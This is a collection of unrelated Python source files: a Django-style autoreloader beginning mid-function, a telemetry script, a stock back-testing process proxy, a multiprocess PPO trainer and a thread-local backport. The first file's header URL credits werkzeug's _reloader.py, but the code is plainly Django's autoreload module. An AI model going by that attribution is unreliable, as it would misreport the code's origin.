# https://github.com/pallets/werkzeug/blob/7477be2853df70a022d9613e765581b9411c3c39/werkzeug/_reloader.py
# Create a sorted list of the path components, longest first.
path_parts = sorted([x.parts for x in paths], key=len, reverse=True)
tree = {}
for chunks in path_parts:
node = tree
# Add each part of the path to the tree.
for chunk in chunks:
node = node.setdefault(chunk, {})
# Clear the last leaf in the tree.
node.clear()
# Turn the tree into a list of Path instances.
def _walk(node, path):
for prefix, child in node.items():
yield from _walk(child, path + (prefix,))
if not node:
yield Path(*path)
return tuple(_walk(tree, ()))
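# Illustrative sketch (not part of the original module): given watched files under
# /srv/app, /srv/app/utils and /opt/lib, common_roots() collapses their parent
# directories to the shortest set of roots that covers everything, e.g.
#
#     roots = common_roots(frozenset({
#         Path('/srv/app/models.py').parent,
#         Path('/srv/app/utils/helpers.py').parent,
#         Path('/opt/lib/module.py').parent,
#     }))
#     # roots contains Path('/srv/app') and Path('/opt/lib'); /srv/app/utils is
#     # dropped because it is already covered by /srv/app.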
def sys_path_directories():
"""
Yield absolute directories from sys.path, ignoring entries that don't
exist.
"""
for path in sys.path:
path = Path(path)
try:
resolved_path = path.resolve(strict=True).absolute()
except FileNotFoundError:
continue
# If the path is a file (like a zip file), watch the parent directory.
if resolved_path.is_file():
yield resolved_path.parent
else:
yield resolved_path
def get_child_arguments():
"""
    Return the arguments needed to re-execute the current process as a child.
    This contains a workaround for Windows if the executable is reported to not
    have the .exe extension, which can cause bugs on reloading.
"""
import django.__main__
args = [sys.executable] + ['-W%s' % o for o in sys.warnoptions]
if sys.argv[0] == django.__main__.__file__:
# The server was started with `python -m django runserver`.
args += ['-m', 'django']
args += sys.argv[1:]
else:
args += sys.argv
return args
def trigger_reload(filename):
logger.info('%s changed, reloading.', filename)
sys.exit(3)
def restart_with_reloader():
new_environ = {**os.environ, DJANGO_AUTORELOAD_ENV: 'true'}
args = get_child_arguments()
while True:
p = subprocess.run(args, env=new_environ, close_fds=False)
if p.returncode != 3:
return p.returncode
class BaseReloader:
def __init__(self):
self.extra_files = set()
self.directory_globs = defaultdict(set)
self._stop_condition = threading.Event()
def watch_dir(self, path, glob):
path = Path(path)
try:
path = path.absolute()
except FileNotFoundError:
logger.debug(
'Unable to watch directory %s as it cannot be resolved.',
path,
exc_info=True,
)
return
logger.debug('Watching dir %s with glob %s.', path, glob)
self.directory_globs[path].add(glob)
def watched_files(self, include_globs=True):
"""
Yield all files that need to be watched, including module files and
files within globs.
"""
yield from iter_all_python_module_files()
yield from self.extra_files
if include_globs:
for directory, patterns in self.directory_globs.items():
for pattern in patterns:
yield from directory.glob(pattern)
def wait_for_apps_ready(self, app_reg, django_main_thread):
"""
Wait until Django reports that the apps have been loaded. If the given
thread has terminated before the apps are ready, then a SyntaxError or
other non-recoverable error has been raised. In that case, stop waiting
for the apps_ready event and continue processing.
Return True if the thread is alive and the ready event has been
triggered, or False if the thread is terminated while waiting for the
event.
"""
while django_main_thread.is_alive():
if app_reg.ready_event.wait(timeout=0.1):
return True
else:
logger.debug('Main Django thread has terminated before apps are ready.')
return False
def run(self, django_main_thread):
logger.debug('Waiting for apps ready_event.')
self.wait_for_apps_ready(apps, django_main_thread)
from django.urls import get_resolver
# Prevent a race condition where URL modules aren't loaded when the
# reloader starts by accessing the urlconf_module property.
try:
get_resolver().urlconf_module
except Exception:
# Loading the urlconf can result in errors during development.
# If this occurs then swallow the error and continue.
pass
logger.debug('Apps ready_event triggered. Sending autoreload_started signal.')
autoreload_started.send(sender=self)
self.run_loop()
def run_loop(self):
ticker = self.tick()
while not self.should_stop:
try:
next(ticker)
except StopIteration:
break
self.stop()
def tick(self):
"""
This generator is called in a loop from run_loop. It's important that
the method takes care of pausing or otherwise waiting for a period of
time. This split between run_loop() and tick() is to improve the
testability of the reloader implementations by decoupling the work they
do from the loop.
"""
raise NotImplementedError('subclasses must implement tick().')
@classmethod
def check_availability(cls):
raise NotImplementedError('subclasses must implement check_availability().')
def notify_file_changed(self, path):
results = file_changed.send(sender=self, file_path=path)
logger.debug('%s notified as changed. Signal results: %s.', path, results)
if not any(res[1] for res in results):
trigger_reload(path)
# These are primarily used for testing.
@property
def should_stop(self):
return self._stop_condition.is_set()
def stop(self):
self._stop_condition.set()
class StatReloader(BaseReloader):
SLEEP_TIME = 1 # Check for changes once per second.
def tick(self):
mtimes = {}
while True:
for filepath, mtime in self.snapshot_files():
old_time = mtimes.get(filepath)
mtimes[filepath] = mtime
if old_time is None:
logger.debug('File %s first seen with mtime %s', filepath, mtime)
continue
elif mtime > old_time:
logger.debug('File %s previous mtime: %s, current mtime: %s', filepath, old_time, mtime)
self.notify_file_changed(filepath)
time.sleep(self.SLEEP_TIME)
yield
def snapshot_files(self):
# watched_files may produce duplicate paths if globs overlap.
seen_files = set()
for file in self.watched_files():
if file in seen_files:
continue
try:
mtime = file.stat().st_mtime
except OSError:
# This is thrown when the file does not exist.
continue
seen_files.add(file)
yield file, mtime
@classmethod
def check_availability(cls):
return True
class WatchmanUnavailable(RuntimeError):
pass
class WatchmanReloader(BaseReloader):
def __init__(self):
self.roots = defaultdict(set)
self.processed_request = threading.Event()
self.client_timeout = int(os.environ.get('DJANGO_WATCHMAN_TIMEOUT', 5))
super().__init__()
@cached_property
def client(self):
return pywatchman.client(timeout=self.client_timeout)
def _watch_root(self, root):
# In practice this shouldn't occur, however, it's possible that a
# directory that doesn't exist yet is being watched. If it's outside of
        # sys.path then this will end up as a new root. How to handle this isn't
        # clear: not adding the root will likely break when subscribing to the
        # changes; however, as this is currently an internal API, no files
        # will be watched outside of sys.path. Fixing this by checking
        # inside watch_glob() and watch_dir() is expensive; instead this could
        # fall back to the StatReloader if this case is detected. For
        # now, watching its parent, if possible, is sufficient.
if not root.exists():
if not root.parent.exists():
                logger.warning('Unable to watch root dir %s as neither it nor its parent exists.', root)
return
root = root.parent
result = self.client.query('watch-project', str(root.absolute()))
if 'warning' in result:
logger.warning('Watchman warning: %s', result['warning'])
logger.debug('Watchman watch-project result: %s', result)
return result['watch'], result.get('relative_path')
@functools.lru_cache()
def _get_clock(self, root):
return self.client.query('clock', root)['clock']
def _subscribe(self, directory, name, expression):
root, rel_path = self._watch_root(directory)
query = {
'expression': expression,
'fields': ['name'],
'since': self._get_clock(root),
'dedup_results': True,
}
if rel_path:
query['relative_root'] = rel_path
logger.debug('Issuing watchman subscription %s, for root %s. Query: %s', name, root, query)
self.client.query('subscribe', root, name, query)
def _subscribe_dir(self, directory, filenames):
if not directory.exists():
if not directory.parent.exists():
                logger.warning('Unable to watch directory %s as neither it nor its parent exists.', directory)
return
prefix = 'files-parent-%s' % directory.name
filenames = ['%s/%s' % (directory.name, filename) for filename in filenames]
directory = directory.parent
expression = ['name', filenames, 'wholename']
else:
prefix = 'files'
expression = ['name', filenames]
self._subscribe(directory, '%s:%s' % (prefix, directory), expression)
def _watch_glob(self, directory, patterns):
"""
Watch a directory with a specific glob. If the directory doesn't yet
exist, attempt to watch the parent directory and amend the patterns to
        include this. It's important this method isn't called more than once per
directory when updating all subscriptions. Subsequent calls will
overwrite the named subscription, so it must include all possible glob
expressions.
"""
prefix = 'glob'
if not directory.exists():
if not directory.parent.exists():
                logger.warning('Unable to watch directory %s as neither it nor its parent exists.', directory)
return
prefix = 'glob-parent-%s' % directory.name
patterns = ['%s/%s' % (directory.name, pattern) for pattern in patterns]
directory = directory.parent
expression = ['anyof']
for pattern in patterns:
expression.append(['match', pattern, 'wholename'])
self._subscribe(directory, '%s:%s' % (prefix, directory), expression)
def watched_roots(self, watched_files):
extra_directories = self.directory_globs.keys()
watched_file_dirs = [f.parent for f in watched_files]
sys_paths = list(sys_path_directories())
return frozenset((*extra_directories, *watched_file_dirs, *sys_paths))
def _update_watches(self):
watched_files = list(self.watched_files(include_globs=False))
found_roots = common_roots(self.watched_roots(watched_files))
logger.debug('Watching %s files', len(watched_files))
logger.debug('Found common roots: %s', found_roots)
        # Set up initial roots for performance, shortest roots first.
for root in sorted(found_roots):
self._watch_root(root)
for directory, patterns in self.directory_globs.items():
self._watch_glob(directory, patterns)
# Group sorted watched_files by their parent directory.
sorted_files = sorted(watched_files, key=lambda p: p.parent)
for directory, group in itertools.groupby(sorted_files, key=lambda p: p.parent):
# These paths need to be relative to the parent directory.
self._subscribe_dir(directory, [str(p.relative_to(directory)) for p in group])
def update_watches(self):
try:
self._update_watches()
except Exception as ex:
# If the service is still available, raise the original exception.
if self.check_server_status(ex):
raise
def _check_subscription(self, sub):
subscription = self.client.getSubscription(sub)
if not subscription:
return
logger.debug('Watchman subscription %s has results.', sub)
for result in subscription:
# When using watch-project, it's not simple to get the relative
# directory without storing some specific state. Store the full
# path to the directory in the subscription name, prefixed by its
# type (glob, files).
root_directory = Path(result['subscription'].split(':', 1)[1])
logger.debug('Found root directory %s', root_directory)
for file in result.get('files', []):
self.notify_file_changed(root_directory / file)
def request_processed(self, **kwargs):
logger.debug('Request processed. Setting update_watches event.')
self.processed_request.set()
def tick(self):
request_finished.connect(self.request_processed)
self.update_watches()
while True:
if self.processed_request.is_set():
self.update_watches()
self.processed_request.clear()
try:
self.client.receive()
except pywatchman.SocketTimeout:
pass
except pywatchman.WatchmanError as ex:
logger.debug('Watchman error: %s, checking server status.', ex)
self.check_server_status(ex)
else:
for sub in list(self.client.subs.keys()):
self._check_subscription(sub)
yield
def stop(self):
self.client.close()
super().stop()
def check_server_status(self, inner_ex=None):
"""Return True if the server is available."""
try:
self.client.query('version')
except Exception:
raise WatchmanUnavailable(str(inner_ex)) from inner_ex
return True
@classmethod
def check_availability(cls):
if not pywatchman:
raise WatchmanUnavailable('pywatchman not installed.')
client = pywatchman.client(timeout=0.1)
try:
result = client.capabilityCheck()
except Exception:
# The service is down?
raise WatchmanUnavailable('Cannot connect to the watchman service.')
version = get_version_tuple(result['version'])
# Watchman 4.9 includes multiple improvements to watching project
# directories as well as case insensitive filesystems.
logger.debug('Watchman version %s', version)
if version < (4, 9):
raise WatchmanUnavailable('Watchman 4.9 or later is required.')
def get_reloader():
"""Return the most suitable reloader for this environment."""
try:
WatchmanReloader.check_availability()
except WatchmanUnavailable:
return StatReloader()
return WatchmanReloader()
def start_django(reloader, main_func, *args, **kwargs):
ensure_echo_on()
main_func = check_errors(main_func)
django_main_thread = threading.Thread(target=main_func, args=args, kwargs=kwargs, name='django-main-thread')
    django_main_thread.daemon = True
django_main_thread.start()
while not reloader.should_stop:
try:
reloader.run(django_main_thread)
except WatchmanUnavailable as ex:
# It's possible that the watchman service shuts down or otherwise
# becomes unavailable. In that case, use the StatReloader.
reloader = StatReloader()
logger.error('Error connecting to Watchman: %s', ex)
logger.info('Watching for file changes with %s', reloader.__class__.__name__)
def run_with_reloader(main_func, *args, **kwargs):
signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
try:
if os.environ.get(DJANGO_AUTORELOAD_ENV) == 'true':
reloader = get_reloader()
logger.info('Watching for file changes with %s', reloader.__class__.__name__)
start_django(reloader, main_func, *args, **kwargs)
else:
exit_code = restart_with_reloader()
sys.exit(exit_code)
except KeyboardInterrupt:
pass
|
telem_main.py
|
from multiprocessing import Process, Queue
from main_telem import telem_tools
import time
import numpy as np
GLOBAL_WINDOW_SIZE = 1000
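# NOTE: telem_tools.RingBuffer (imported above) is the buffer actually used below.
# The class that follows is NOT that implementation; it is a minimal, hypothetical
# NumPy sketch of the interface this script assumes (extend() and get()), included
# only for illustration.
class _ExampleRingBuffer:
    """Fixed-size ring buffer that keeps the most recent `size` samples."""
    def __init__(self, size):
        self._size = size
        self._data = np.zeros(size)

    def extend(self, values):
        # Keep at most `size` new samples, shift old data left, append the new ones.
        values = np.asarray(values).ravel()[-self._size:]
        self._data = np.roll(self._data, -len(values))
        self._data[-len(values):] = values

    def get(self):
        # Return a copy of the current window, oldest sample first.
        return self._data.copy()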
def data_read_daemon(queue, ringbuf):
"""
    Data reading process (pseudo-daemon).
    Fills up the window data, then triggers
    the window analysis process.
"""
window_counter = GLOBAL_WINDOW_SIZE
data_counter = 0
print("Started Sensor Read Daemon")
while True:
# Expect some of the communications to be VERY slow
time.sleep(np.random.random()*0.01)
data = np.random.randint(0, 100) # Random data (temporary)
# print(data)
ringbuf.extend(np.array([data])) # place data in the ring buffer
window_counter -= 1 # Decrement local window size counter
if window_counter == 0:
# Process the data currently in the ring buffer
ring_data = ringbuf.get()
data_counter += 1
print("Buffer filled")
# print(ring_data)
window_counter = GLOBAL_WINDOW_SIZE
# Send off to window process function
pw = Process(target=process_window_data,
args=(ring_data, data_counter, queue))
pw.start()
def process_window_data(data, data_count, queue):
"""
Process for saving the windowed timeseries data
for analysis via metrics or streaming algorithms.
Places data on queue for long-term storage
"""
time.sleep(3) # Simulating data send delay (temporary)
print("large data read, saving...", data_count)
queue.put(data) # placing read data in the queue
def store_window_data(queue):
"""
    Process for saving the data in long-term storage.
"""
while True:
        if queue.empty():
            time.sleep(0.01)  # nothing to do; a short sleep avoids a busy-wait
else:
            if queue.full():
print("WARNING: QUEUE IS FULL")
print("taking off queue")
data = queue.get()
time.sleep(5) # Simulating data send delay (temporary)
print("Long term storage done")
if __name__ == '__main__':
"""
Main Loop of the telemetry system
Operated by a multiprocessing queue which reads/stores data
and uses a ring buffer in NumPy to create a window/snapshot
of time series data to process in algorithms or streaming
machine learning algorithms.
"""
# Main shared Queue and Ring Buffer
q = Queue()
ringbuf = telem_tools.RingBuffer(GLOBAL_WINDOW_SIZE)
# Start data read daemon
dr = Process(target=data_read_daemon, args=(q,ringbuf))
dr.start()
# Start write daemon
wr = Process(target=store_window_data, args=(q,))
wr.start()
while True:
time.sleep(0.1)
# This is the place where your main loop or logic goes
|
DyStockBackTestingStrategyEngineProxy.py
|
import multiprocessing
import threading
import queue
from .DyStockBackTestingStrategyEngineProcess import *
from Stock.Config.DyStockConfig import DyStockConfig
class DyStockBackTestingStrategyEngineProxy(threading.Thread):
""" 以进程方式启动一个周期的策略回测 """
def __init__(self, eventEngine):
super().__init__()
self._eventEngine = eventEngine
self._ctx = multiprocessing.get_context('spawn')
self._queue = self._ctx.Queue() # queue to receive event from child processes
self._processes = []
self._childQueues = []
self.start()
def run(self):
while True:
event = self._queue.get()
self._eventEngine.put(event)
def startBackTesting(self, reqData):
childQueue = self._ctx.Queue()
self._childQueues.append(childQueue)
config = DyStockConfig.getConfigForBackTesting()
p = self._ctx.Process(target=dyStockBackTestingStrategyEngineProcess, args=(self._queue, childQueue, reqData, config))
p.start()
self._processes.append(p)
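# Minimal usage sketch (hypothetical, for illustration only): the proxy only
# requires an event engine exposing put(); each startBackTesting() call spawns
# one child process running dyStockBackTestingStrategyEngineProcess.
#
#     proxy = DyStockBackTestingStrategyEngineProxy(eventEngine)
#     proxy.startBackTesting(reqData)   # reqData describes one back-testing period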
class DyStockBackTestingStrategyEngineProxyThread(threading.Thread):
""" 以线程方式启动一个周期的策略回测, 主要做调试用 """
def __init__(self, eventEngine):
super().__init__()
self._eventEngine = eventEngine
self._queue = queue.Queue() # queue to receive event from child threads
self._threads = []
self._childQueues = []
self.start()
def run(self):
while True:
event = self._queue.get()
self._eventEngine.put(event)
def startBackTesting(self, reqData):
childQueue = queue.Queue()
self._childQueues.append(childQueue)
t = threading.Thread(target=dyStockBackTestingStrategyEngineProcess, args=(self._queue, childQueue, reqData))
t.start()
self._threads.append(t)
|
ppo_continuous_multiprocess.py
|
'''
PPO
'''
import math
import random
import gym
import numpy as np
import torch
torch.multiprocessing.set_start_method('forkserver', force=True)  # critical to make multiprocessing work
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.distributions import Normal, MultivariateNormal
from IPython.display import clear_output
import matplotlib.pyplot as plt
from matplotlib import animation
from IPython.display import display
from reacher import Reacher
import argparse
import time
import torch.multiprocessing as mp
from torch.multiprocessing import Process
from multiprocessing import Process, Manager
from multiprocessing.managers import BaseManager
import threading as td
GPU = True
device_idx = 0
if GPU:
device = torch.device("cuda:" + str(device_idx) if torch.cuda.is_available() else "cpu")
else:
device = torch.device("cpu")
print(device)
parser = argparse.ArgumentParser(description='Train or test neural net motor controller.')
parser.add_argument('--train', dest='train', action='store_true', default=False)
parser.add_argument('--test', dest='test', action='store_true', default=False)
args = parser.parse_args()
##################### hyper parameters ####################
ENV_NAME = 'Pendulum-v0' # environment name
RANDOMSEED = 2 # random seed
EP_MAX = 1000 # total number of episodes for training
EP_LEN = 200 # total number of steps for each episode
GAMMA = 0.9 # reward discount
A_LR = 0.0001 # learning rate for actor
C_LR = 0.0002 # learning rate for critic
BATCH = 128 # update batchsize
A_UPDATE_STEPS = 10 # actor update steps
C_UPDATE_STEPS = 10 # critic update steps
EPS = 1e-8 # numerical residual
MODEL_PATH = 'model/ppo_multi'
NUM_WORKERS=2 # or: mp.cpu_count()
ACTION_RANGE = 1. # if unnormalized, normalized action range should be 1.
METHOD = [
dict(name='kl_pen', kl_target=0.01, lam=0.5), # KL penalty
dict(name='clip', epsilon=0.2), # Clipped surrogate objective, find this is better
][0] # choose the method for optimization
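# For reference (restating what PPO.a_train() below implements, not new behavior):
# with ratio = pi(a|s) / pi_old(a|s) and advantage adv, the 'clip' method minimizes
#     loss = -mean( min(ratio * adv, clip(ratio, 1 - epsilon, 1 + epsilon) * adv) )
# while 'kl_pen' minimizes -mean(ratio * adv - lam * KL(pi_old || pi)), with lam
# adapted towards kl_target.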
############################### PPO ####################################
class AddBias(nn.Module):
def __init__(self, bias):
super(AddBias, self).__init__()
self._bias = nn.Parameter(bias.unsqueeze(1))
def forward(self, x):
if x.dim() == 2:
bias = self._bias.t().view(1, -1)
else:
bias = self._bias.t().view(1, -1, 1, 1)
return x + bias
class ValueNetwork(nn.Module):
def __init__(self, state_dim, hidden_dim, init_w=3e-3):
super(ValueNetwork, self).__init__()
self.linear1 = nn.Linear(state_dim, hidden_dim)
# self.linear2 = nn.Linear(hidden_dim, hidden_dim)
# self.linear3 = nn.Linear(hidden_dim, hidden_dim)
self.linear4 = nn.Linear(hidden_dim, 1)
# weights initialization
self.linear4.weight.data.uniform_(-init_w, init_w)
self.linear4.bias.data.uniform_(-init_w, init_w)
def forward(self, state):
x = F.relu(self.linear1(state))
# x = F.relu(self.linear2(x))
# x = F.relu(self.linear3(x))
x = self.linear4(x)
return x
class PolicyNetwork(nn.Module):
def __init__(self, num_inputs, num_actions, hidden_dim, action_range=1., init_w=3e-3, log_std_min=-20, log_std_max=2):
super(PolicyNetwork, self).__init__()
self.log_std_min = log_std_min
self.log_std_max = log_std_max
self.linear1 = nn.Linear(num_inputs, hidden_dim)
self.linear2 = nn.Linear(hidden_dim, hidden_dim)
# self.linear3 = nn.Linear(hidden_dim, hidden_dim)
# self.linear4 = nn.Linear(hidden_dim, hidden_dim)
self.mean_linear = nn.Linear(hidden_dim, num_actions)
# implementation 1
# self.log_std_linear = nn.Linear(hidden_dim, num_actions)
# # implementation 2: not dependent on latent features, reference:https://github.com/ikostrikov/pytorch-a2c-ppo-acktr-gail/blob/master/a2c_ppo_acktr/distributions.py
self.log_std = AddBias(torch.zeros(num_actions))
self.num_actions = num_actions
self.action_range = action_range
def forward(self, state):
x = F.relu(self.linear1(state))
x = F.relu(self.linear2(x))
# x = F.relu(self.linear3(x))
# x = F.relu(self.linear4(x))
        mean = self.action_range * torch.tanh(self.mean_linear(x))  # torch.tanh: F.tanh is deprecated
# implementation 1
# log_std = self.log_std_linear(x)
# log_std = torch.clamp(log_std, self.log_std_min, self.log_std_max)
# implementation 2
zeros = torch.zeros(mean.size())
if state.is_cuda:
zeros = zeros.cuda()
log_std = self.log_std(zeros)
return mean, log_std
def get_action(self, state, deterministic=False):
state = torch.FloatTensor(state).unsqueeze(0).to(device)
mean, log_std = self.forward(state)
std = log_std.exp()
normal = Normal(0, 1)
z = normal.sample()
action = mean+std*z
action = torch.clamp(action, -self.action_range, self.action_range)
return action.squeeze(0)
def sample_action(self,):
a=torch.FloatTensor(self.num_actions).uniform_(-1, 1)
return a.numpy()
class NormalizedActions(gym.ActionWrapper):
def _action(self, action):
low = self.action_space.low
high = self.action_space.high
action = low + (action + 1.0) * 0.5 * (high - low)
action = np.clip(action, low, high)
return action
def _reverse_action(self, action):
low = self.action_space.low
high = self.action_space.high
action = 2 * (action - low) / (high - low) - 1
action = np.clip(action, low, high)
return action
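# Worked example (assuming Pendulum-v0's action space of low=-2.0, high=2.0):
# _action(0.5) maps the normalized policy output into environment units:
#     -2.0 + (0.5 + 1.0) * 0.5 * (2.0 - (-2.0)) = 1.0
# and _reverse_action(1.0) maps it back to the normalized range:
#     2 * (1.0 - (-2.0)) / (2.0 - (-2.0)) - 1 = 0.5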
class PPO(object):
'''
PPO class
'''
def __init__(self, state_dim, action_dim, hidden_dim=512, a_lr=3e-4, c_lr=3e-4):
self.actor = PolicyNetwork(state_dim, action_dim, hidden_dim, ACTION_RANGE).to(device)
self.actor_old = PolicyNetwork(state_dim, action_dim, hidden_dim, ACTION_RANGE).to(device)
self.critic = ValueNetwork(state_dim, hidden_dim).to(device)
self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=a_lr)
self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=c_lr)
print(self.actor, self.critic)
def a_train(self, s, a, adv):
'''
Update policy network
:param s: state
:param a: action
:param adv: advantage
:return:
'''
mu, log_std = self.actor(s)
pi = Normal(mu, torch.exp(log_std))
mu_old, log_std_old = self.actor_old(s)
oldpi = Normal(mu_old, torch.exp(log_std_old))
# ratio = torch.exp(pi.log_prob(a) - oldpi.log_prob(a)) # sometimes give nan
ratio = torch.exp(pi.log_prob(a)) / (torch.exp(oldpi.log_prob(a)) + EPS)
surr = ratio * adv
if METHOD['name'] == 'kl_pen':
lam = METHOD['lam']
kl = torch.distributions.kl.kl_divergence(oldpi, pi)
kl_mean = kl.mean()
aloss = -((surr - lam * kl).mean())
else: # clipping method, find this is better
aloss = -torch.mean(torch.min(surr, torch.clamp(ratio, 1. - METHOD['epsilon'], 1. + METHOD['epsilon']) * adv))
self.actor_optimizer.zero_grad()
aloss.backward()
self.actor_optimizer.step()
if METHOD['name'] == 'kl_pen':
return kl_mean
def update_old_pi(self):
'''
Update old policy parameter
:return: None
'''
for p, oldp in zip(self.actor.parameters(), self.actor_old.parameters()):
oldp.data.copy_(p)
def c_train(self, cumulative_r, s):
'''
        Update critic (value) network
:param cumulative_r: cumulative reward
:param s: state
:return: None
'''
v = self.critic(s)
advantage = cumulative_r - v
closs = (advantage**2).mean()
self.critic_optimizer.zero_grad()
closs.backward()
self.critic_optimizer.step()
def cal_adv(self, s, cumulative_r):
'''
Calculate advantage
:param s: state
:param cumulative_r: cumulative reward
:return: advantage
'''
advantage = cumulative_r - self.critic(s)
return advantage.detach()
def update(self, s, a, r):
'''
        Update parameters with the constraint of KL divergence
:param s: state
:param a: act
:param r: reward
:return: None
'''
s = torch.FloatTensor(s).to(device)
a = torch.FloatTensor(a).to(device)
r = torch.FloatTensor(r).to(device)
self.update_old_pi()
adv = self.cal_adv(s, r)
# adv = (adv - adv.mean())/(adv.std()+1e-6) # sometimes helpful
# update actor
if METHOD['name'] == 'kl_pen':
for _ in range(A_UPDATE_STEPS):
kl = self.a_train(s, a, adv)
                if kl > 4 * METHOD['kl_target']:  # this is in Google's paper
break
if kl < METHOD['kl_target'] / 1.5: # adaptive lambda, this is in OpenAI's paper
METHOD['lam'] /= 2
elif kl > METHOD['kl_target'] * 1.5:
METHOD['lam'] *= 2
METHOD['lam'] = np.clip(
METHOD['lam'], 1e-4, 10
) # sometimes explode, this clipping is MorvanZhou's solution
else: # clipping method, find this is better (OpenAI's paper)
for _ in range(A_UPDATE_STEPS):
self.a_train(s, a, adv)
# update critic
for _ in range(C_UPDATE_STEPS):
self.c_train(r, s)
def choose_action(self, s):
'''
Choose action
:param s: state
:return: clipped act
'''
a = self.actor.get_action(s)
return a.detach().cpu().numpy()
def get_v(self, s):
'''
Compute value
:param s: state
:return: value
'''
s = s.astype(np.float32)
if s.ndim < 2: s = s[np.newaxis, :]
s = torch.FloatTensor(s).to(device)
return self.critic(s).squeeze(0).detach().cpu().numpy()
def save_model(self, path):
torch.save(self.actor.state_dict(), path+'_actor')
torch.save(self.critic.state_dict(), path+'_critic')
torch.save(self.actor_old.state_dict(), path+'_actor_old')
def load_model(self, path):
self.actor.load_state_dict(torch.load(path+'_actor'))
self.critic.load_state_dict(torch.load(path+'_critic'))
self.actor_old.load_state_dict(torch.load(path+'_actor_old'))
self.actor.eval()
self.critic.eval()
self.actor_old.eval()
def ShareParameters(adamoptim):
    ''' Share parameters of Adam optimizers for multiprocessing '''
for group in adamoptim.param_groups:
for p in group['params']:
state = adamoptim.state[p]
# initialize: have to initialize here, or else cannot find
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p.data)
state['exp_avg_sq'] = torch.zeros_like(p.data)
# share in memory
state['exp_avg'].share_memory_()
state['exp_avg_sq'].share_memory_()
def plot(rewards):
clear_output(True)
plt.figure(figsize=(10,5))
plt.plot(rewards)
plt.savefig('ppo_multi.png')
# plt.show()
plt.clf()
def worker(id, ppo, rewards_queue):
env = gym.make(ENV_NAME).unwrapped
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
all_ep_r = []
for ep in range(EP_MAX):
s = env.reset()
buffer={
'state':[],
'action':[],
'reward':[]
}
ep_r = 0
t0 = time.time()
for t in range(EP_LEN): # in one episode
# env.render()
a = ppo.choose_action(s)
s_, r, done, _ = env.step(a)
buffer['state'].append(s)
buffer['action'].append(a)
# buffer['reward'].append(r)
            buffer['reward'].append((r + 8) / 8)  # normalize reward, found to be useful sometimes; from my experience it works with the 'penalty' version, while the 'clip' version works without this normalization
s = s_
ep_r += r
# update ppo
if (t + 1) % BATCH == 0 or t == EP_LEN - 1 or done:
if done:
v_s_=0
else:
v_s_ = ppo.get_v(s_)[0]
discounted_r = []
for r in buffer['reward'][::-1]:
v_s_ = r + GAMMA * v_s_
discounted_r.append(v_s_)
discounted_r.reverse()
bs, ba, br = np.vstack(buffer['state']), np.vstack(buffer['action']), np.array(discounted_r)[:, np.newaxis]
buffer['state'], buffer['action'], buffer['reward'] = [], [], []
ppo.update(bs, ba, br)
if done:
break
if ep == 0:
all_ep_r.append(ep_r)
else:
all_ep_r.append(all_ep_r[-1] * 0.9 + ep_r * 0.1)
if ep%50==0:
ppo.save_model(MODEL_PATH)
print(
'Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'.format(
ep, EP_MAX, ep_r,
time.time() - t0
)
)
rewards_queue.put(ep_r)
ppo.save_model(MODEL_PATH)
env.close()
def main():
# reproducible
# env.seed(RANDOMSEED)
np.random.seed(RANDOMSEED)
torch.manual_seed(RANDOMSEED)
env = NormalizedActions(gym.make(ENV_NAME).unwrapped)
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
ppo = PPO(state_dim, action_dim, hidden_dim=128)
if args.train:
ppo.actor.share_memory()
ppo.actor_old.share_memory()
ppo.critic.share_memory()
ShareParameters(ppo.actor_optimizer)
ShareParameters(ppo.critic_optimizer)
rewards_queue=mp.Queue() # used for get rewards from all processes and plot the curve
processes=[]
rewards=[]
for i in range(NUM_WORKERS):
process = Process(target=worker, args=(i, ppo, rewards_queue)) # the args contain shared and not shared
process.daemon=True # all processes closed when the main stops
processes.append(process)
[p.start() for p in processes]
        while True:  # keep getting the episode reward from the queue
r = rewards_queue.get()
if r is not None:
if len(rewards) == 0:
rewards.append(r)
else:
rewards.append(rewards[-1] * 0.9 + r * 0.1)
else:
break
if len(rewards)%20==0 and len(rewards)>0:
plot(rewards)
[p.join() for p in processes] # finished at the same time
ppo.save_model(MODEL_PATH)
if args.test:
ppo.load_model(MODEL_PATH)
while True:
s = env.reset()
for i in range(EP_LEN):
env.render()
s, r, done, _ = env.step(ppo.choose_action(s))
if done:
break
if __name__ == '__main__':
main()
|
_cpthreadinglocal.py
|
# This is a backport of Python-2.4's threading.local() implementation
"""Thread-local objects
(Note that this module provides a Python version of thread
threading.local class. Depending on the version of Python you're
using, there may be a faster one available. You should always import
the local class from threading.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = mydata.__dict__.items()
... items.sort()
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... initialized = False
... def __init__(self, **kw):
... if self.initialized:
... raise SystemError('__init__ called too many times')
... self.initialized = True
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red'), ('initialized', True)], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
